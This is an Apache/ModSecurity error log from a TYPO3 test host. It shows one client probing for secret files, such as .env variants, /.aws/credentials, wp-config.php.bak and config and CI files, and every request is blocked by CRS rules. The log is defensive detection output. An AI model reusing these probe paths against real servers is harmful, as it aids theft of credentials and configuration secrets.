[Tue Aug 12 02:35:26.529328 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJqMTr1qHv1U4ugo3Y_zkgAAAAI"]
[Tue Aug 12 02:35:26.529558 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.example"] [unique_id "aJqMTr1qHv1U4ugo3Y_zkgAAAAI"]
[Tue Aug 12 02:35:26.551854 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.stage"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJqMTr1qHv1U4ugo3Y_zkwAAAAI"]
[Tue Aug 12 02:35:26.552106 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJqMTr1qHv1U4ugo3Y_zkwAAAAI"]
[Tue Aug 12 02:35:26.552303 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.stage"] [unique_id "aJqMTr1qHv1U4ugo3Y_zkwAAAAI"]
[Tue Aug 12 02:35:26.624165 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .rdb/ .resources/ .resx/ .sql/ .swp/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/usr/share/modsecurity-crs/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "997"] [id "920440"] [msg "URL file extension is restricted by policy"] [data ".old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJqMTr1qHv1U4ugo3Y_zlQAAAAI"]
[Tue Aug 12 02:35:26.624329 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJqMTr1qHv1U4ugo3Y_zlQAAAAI"]
[Tue Aug 12 02:35:26.624641 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 10)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJqMTr1qHv1U4ugo3Y_zlQAAAAI"]
[Tue Aug 12 02:35:26.624910 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 10 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 10, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.old"] [unique_id "aJqMTr1qHv1U4ugo3Y_zlQAAAAI"]
[Tue Aug 12 02:35:26.647304 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env_sample"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aJqMTr1qHv1U4ugo3Y_zlgAAAAI"]
[Tue Aug 12 02:35:26.647549 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aJqMTr1qHv1U4ugo3Y_zlgAAAAI"]
[Tue Aug 12 02:35:26.647743 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env_sample"] [unique_id "aJqMTr1qHv1U4ugo3Y_zlgAAAAI"]
[Tue Aug 12 02:35:26.710601 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /.env.prod"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJqMTr1qHv1U4ugo3Y_zmAAAAAI"]
[Tue Aug 12 02:35:26.710905 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJqMTr1qHv1U4ugo3Y_zmAAAAAI"]
[Tue Aug 12 02:35:26.711121 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.env.prod"] [unique_id "aJqMTr1qHv1U4ugo3Y_zmAAAAAI"]
[Tue Aug 12 02:35:26.733255 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /crm/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zmQAAAAI"]
[Tue Aug 12 02:35:26.733494 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zmQAAAAI"]
[Tue Aug 12 02:35:26.733679 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/crm/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zmQAAAAI"]
[Tue Aug 12 02:35:26.755881 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /local/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zmgAAAAI"]
[Tue Aug 12 02:35:26.756131 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zmgAAAAI"]
[Tue Aug 12 02:35:26.756316 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/local/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zmgAAAAI"]
[Tue Aug 12 02:35:26.778598 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /core/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zmwAAAAI"]
[Tue Aug 12 02:35:26.778842 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zmwAAAAI"]
[Tue Aug 12 02:35:26.779022 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/core/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zmwAAAAI"]
[Tue Aug 12 02:35:26.801155 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /apps/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_znAAAAAI"]
[Tue Aug 12 02:35:26.801416 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_znAAAAAI"]
[Tue Aug 12 02:35:26.801618 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/apps/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_znAAAAAI"]
[Tue Aug 12 02:35:26.824037 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /application/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_znQAAAAI"]
[Tue Aug 12 02:35:26.825263 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_znQAAAAI"]
[Tue Aug 12 02:35:26.825499 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/application/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_znQAAAAI"]
[Tue Aug 12 02:35:26.847790 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase "/.env" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: /.env found within REQUEST_FILENAME: /web/.env"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zngAAAAI"]
[Tue Aug 12 02:35:26.848032 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zngAAAAI"]
[Tue Aug 12 02:35:26.848221 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/web/.env"] [unique_id "aJqMTr1qHv1U4ugo3Y_zngAAAAI"]
[Tue Aug 12 02:35:26.870566 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Matched phrase ".aws/credentials" at REQUEST_FILENAME. [file "/usr/share/modsecurity-crs/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "124"] [id "930130"] [msg "Restricted File Access Attempt"] [data "Matched Data: .aws/credentials found within REQUEST_FILENAME: /.aws/credentials"] [severity "CRITICAL"] [ver "OWASP_CRS/3.2.0"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aJqMTr1qHv1U4ugo3Y_znwAAAAI"]
[Tue Aug 12 02:35:26.870820 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/usr/share/modsecurity-crs/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "91"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aJqMTr1qHv1U4ugo3Y_znwAAAAI"]
[Tue Aug 12 02:35:26.871016 2025] [:error] [pid 1889988] [client 185.177.72.115:11042] [client 185.177.72.115] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/usr/share/modsecurity-crs/rules/RESPONSE-980-CORRELATION.conf"] [line "86"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): individual paranoia level scores: 5, 0, 0, 0"] [tag "event-correlation"] [hostname "surf.test.indacotrentino.com"] [uri "/.aws/credentials"] [unique_id "aJqMTr1qHv1U4ugo3Y_znwAAAAI"]
[Tue Aug 12 02:35:26.892909 2025] [authz_core:error] [pid 1889988] [client 185.177.72.115:11042] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/wp-config.php.bak
[Tue Aug 12 02:35:27.679774 2025] [authz_core:error] [pid 1889988] [client 185.177.72.115:11042] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Tue Aug 12 02:35:28.015896 2025] [authz_core:error] [pid 1889988] [client 185.177.72.115:11042] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/storage
[Tue Aug 12 02:35:28.388558 2025] [authz_core:error] [pid 1886708] [client 185.177.72.115:11054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Tue Aug 12 02:35:28.820525 2025] [authz_core:error] [pid 1886708] [client 185.177.72.115:11054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Tue Aug 12 02:35:28.898938 2025] [authz_core:error] [pid 1886708] [client 185.177.72.115:11054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Tue Aug 12 02:35:28.928526 2025] [authz_core:error] [pid 1886708] [client 185.177.72.115:11054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Tue Aug 12 02:35:29.838029 2025] [authz_core:error] [pid 1886708] [client 185.177.72.115:11054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.circleci
[Tue Aug 12 02:35:29.923281 2025] [authz_core:error] [pid 1886708] [client 185.177.72.115:11054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/app
[Tue Aug 12 02:35:29.952643 2025] [authz_core:error] [pid 1886708] [client 185.177.72.115:11054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Tue Aug 12 02:35:30.130570 2025] [authz_core:error] [pid 1886708] [client 185.177.72.115:11054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/config
[Tue Aug 12 02:35:30.159914 2025] [authz_core:error] [pid 1886708] [client 185.177.72.115:11054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/backend
[Tue Aug 12 02:35:30.189120 2025] [authz_core:error] [pid 1886708] [client 185.177.72.115:11054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/api
[Tue Aug 12 02:35:30.313276 2025] [authz_core:error] [pid 1886708] [client 185.177.72.115:11054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/.travis.yml
[Tue Aug 12 02:35:30.342456 2025] [authz_core:error] [pid 1886708] [client 185.177.72.115:11054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/aws.yml
[Tue Aug 12 02:35:30.465700 2025] [authz_core:error] [pid 1886708] [client 185.177.72.115:11054] AH01630: client denied by server configuration: /var/www/surf/TYPO3/public/main.yml
